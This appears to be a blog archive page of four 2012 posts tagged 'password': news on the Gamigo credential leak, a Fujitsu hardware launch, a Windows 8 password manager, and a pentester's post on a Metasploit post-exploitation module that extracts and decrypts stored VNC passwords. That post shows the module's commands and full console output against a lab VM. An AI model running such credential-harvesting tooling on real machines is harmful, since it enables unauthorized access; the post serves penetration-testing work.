Showing posts with label password. Show all posts
Showing posts with label password. Show all posts

Tuesday, July 24, 2012

Over 8 million Gamigo user logins leaked months after breach


password, hacking, breach, login, gami
Millions of user logins swiped from a German gaming company earlier this year have appeared online this month. In February, hackers bypassed the security of free-to-play MMORPG outfit Gamigo, taking over 11 million email addresses and encrypted passwords (though only 8.24 million of the addresses were unique), making it the largest breach of its kind this year, topping June's leak of 6.46 million LinkedIn credentials.
After appearing online this month, security researchers have analyzed the dump, which reportedly includes 3 million US (.com) email addresses, 2.4 million German (.de) addresses, 1.3 million French (.fr) addresses, and 100,000 t-online.de addresses. Users affected by the breach don't really have to worry about their Gamigo account being compromised as the company quickly forced passwords to be reset back in March.
However, folks who used their Gamgio credentials across multiple sites remain at risk and should be extra vigilant about resetting the passwords to those accounts -- especially the email account used on Gamigo. The leak contains addresses for various services including Windows Live Hotmail, Gmail and Yahoo, as well as accounts at companies such as Allianz, Deutsche Bank, ExxonMobil, IBM and Siemens.
ZDNet notes that over 5,000 email addresses were created specifically to register at Gamigo, suggesting those users should be safe, but that's only a tiny fraction of the accounts involved. It's also worth emphasizing that Gamigo protected user passwords with a one-way cryptographic hash algorithm, so complicated passwords may remain secure. PwnedList will tell you if your email address is involved.

Tuesday, July 10, 2012

Fujitsu announces Stylistic Q702 hybrid tablet and LifeBook T902 for Q3


Fujitsu has unveiled two Windows 8-ready portables geared for the business professional. Thesystems will ship with Windows 7 sometime in the third quarter but it’s clear that both were designed with Windows 8 in mind.

The Stylistic Q702 is an 11.6-inch hybrid tablet that supports stylus input and can be paired with an optional keyboard dock much like the Asus Transformer Prime. Inside we find third generation Ivy Bridge processor support (Core i3 or Core i5), 4GB of system memory and up to 128GB of internal flash storage. The display is coated with Corning Gorilla Glass and operates at 1,366 x 768. We are told the tablet weights 1.88-pounds and can run for 4.5 hours on a single charge.

Fujitsu’s LifeBook T902 features a 13-inch Gorilla Glass display that runs at 1,600 x 900, i5 and i7 Ivy Bridge processor options, up to 16GB of RAM and up to 11 hours of battery life (with the add-on battery). Customers can configure the T902 with optional WWAN or LTE radios and there’s even a modular bay that can house an optical drive, an extra hard drive or a spare battery. Additionally, the slot can be left unoccupied to reduce overall weight (4.1-pounds without optical drive).
These business-minded systems include a bevy of professional security features including HDD and BIOS password protection and Trusted Platform Module on the Q702 and Intel Anti-Theft Technology and a biometric fingerprint sensor on the T902, just to name a few.
Pricing starts at $1,099 for the Q702 and $1,899 on the T902. Both systems will be available starting in the third quarter of this year through Fujitsu or one of their many retail partners.

Friday, June 22, 2012

Metasploit VNC Password Extraction


Chris Gates wrote a blog post about the ‘getvncpw’ meterpreter script. I ran into the same issue on Penetration Tests in the past but didn’t know much about the wacked out version of DES that RFB (the VNC protocol) was using. Not being a fan of manually editing a binary and compiling each time I had a password to crack I wanted to find another way, but didn’t get a chance to.
Yesterday I saw this ticket: https://www.metasploit.com/redmine/issues/3183 and thought to myself: “Thats definitely within my coding ability to contribute a patch for”. After almost 15 hours of coding between 9 pm on Saturday and 8 pm on Sunday. It went far and beyond just adding in a bit of code to support UltraVNC.
changelog:
  • Complete rewrite as a post module instead of a meterpreter script
  • Passwords of less than 8 characters are correctly padded (thanks jduck)
  • UltraVNC checks added
  • TightVNC checks added for both VNC and it’s control console
  • Made it very simple to add new checks in either the registry or in a file
  • Output is a bit more verbose (lets you know something is happening
  • Reports authentication credentials found to database
  • Identifies the port that VNC is running on as well
It isn’t in the metasploit trunk so until/if if gets added you can get it here:
If you have a check, find it breaks for some reason or another, or just want to tell me that I suck, please leave a comment or email me.
Here it is in action against my VM with 3 different VNC servers on it (calling the post module in two separate ways) :
Code:
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
 
meterpreter > getuid
Server username: XPBASELINE\Administrator
meterpreter > background
msf exploit(handler) > use post/windows/gather/enum_vnc_pw 
msf post(enum_vnc_pw) > set SESSION 1
SESSION => 1
msf post(enum_vnc_pw) > show options
 
Module options (post/windows/gather/enum_vnc_pw):
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.
 
msf post(enum_vnc_pw) > run
 
[*] Enumerating VNC passwords on XPBASELINE
[*] Checking UltraVNC...
[+] UltraVNC => A85B4C5976979DE93B => thisismy on port: 5900
[+] VIEW ONLY: UltraVNC => DE2C1BA7393F6708B3 => 111 on port: 5900
[*] Checking WinVNC3_HKLM...
[*] Checking WinVNC3_HKCU...
[*] Checking WinVNC3_HKLM_Default...
[*] Checking WinVNC3_HKCU_Default...
[*] Checking WinVNC_HKLM_Default...
[*] Checking WinVNC_HKCU_Default...
[*] Checking WinVNC4_HKLM...
[+] WinVNC4_HKLM => c777b2de337a91cf => mypasswo on port: 5900
[*] Checking WinVNC4_HKCU...
[*] Checking RealVNC_HKLM...
[*] Checking RealVNC_HKCU...
[*] Checking TightVNC_HKLM...
[+] TightVNC_HKLM => 7ebf1e76f732459f => authpass on port: 5900
[*] Checking TightVNC_HKLM_Control_pass...
[+] TightVNC_HKLM_Control_pass => f0299fd0e927cf2f => adminpas on port: 5900
[*] Post module execution completed
 
msf post(enum_vnc_pw) > sessions -i 1
[*] Starting interaction with 1...
 
meterpreter > run post/windows/gather/enum_vnc_pw 
 
[*] Enumerating VNC passwords on XPBASELINE
[*] Checking UltraVNC...
[+] UltraVNC => A85B4C5976979DE93B => thisismy on port: 5900
[+] VIEW ONLY: UltraVNC => DE2C1BA7393F6708B3 => 111 on port: 5900
[*] Checking WinVNC3_HKLM...
[*] Checking WinVNC3_HKCU...
[*] Checking WinVNC3_HKLM_Default...
[*] Checking WinVNC3_HKCU_Default...
[*] Checking WinVNC_HKLM_Default...
[*] Checking WinVNC_HKCU_Default...
[*] Checking WinVNC4_HKLM...
[+] WinVNC4_HKLM => c777b2de337a91cf => mypasswo on port: 5900
[*] Checking WinVNC4_HKCU...
[*] Checking RealVNC_HKLM...
[*] Checking RealVNC_HKCU...
[*] Checking TightVNC_HKLM...
[+] TightVNC_HKLM => 7ebf1e76f732459f => authpass on port: 5900
[*] Checking TightVNC_HKLM_Control_pass...
[+] TightVNC_HKLM_Control_pass => f0299fd0e927cf2f => adminpas on port: 5900
meterpreter >
[source]

Monday, December 19, 2011

Windows 8 to feature built-in password manager, synchronize between computers


Microsoft hopes to simplify the task of managing multiple passwords with the next major release of its popular operating system. According to a post on the company's Building Windows 8 blog, a new feature will allow users to put an unlimited number of individual passwords behind one master password, and have them synchronize across all other Windows 8 machines they use.

Since the Live ID is the only password you'll need to know, you can set complex and unique passwords for multiple websites -- so if one site gets hacked and your credentials are stolen from their servers, you entire digital lives won't be at risk. Windows 8 will automatically enter your login information when visiting a saved website. This is similar to what services like 1Password and LastPass currently offer.

If your Windows Live ID password is somehow lost or stolen, there will be a number of safety features in Windows 8 designed to detect compromise and limit account usage until you can successfully recover access to it. For instance, users can request a confirmation code be sent to a mobile phone number or email address registered with Windows Live. Also, even if your credentials are compromised, you will still have full access to your PC since Windows 8 will accept the last password successfully used to log onto the system.

Microsoft says it will also offer a a number of "convenience" sign-in methods such as Picture Password and biometrics -- they didn't go into details but promised to do so in a future update. You can read more about Windows 8's security features in the characteristically long post at Building Windows 8.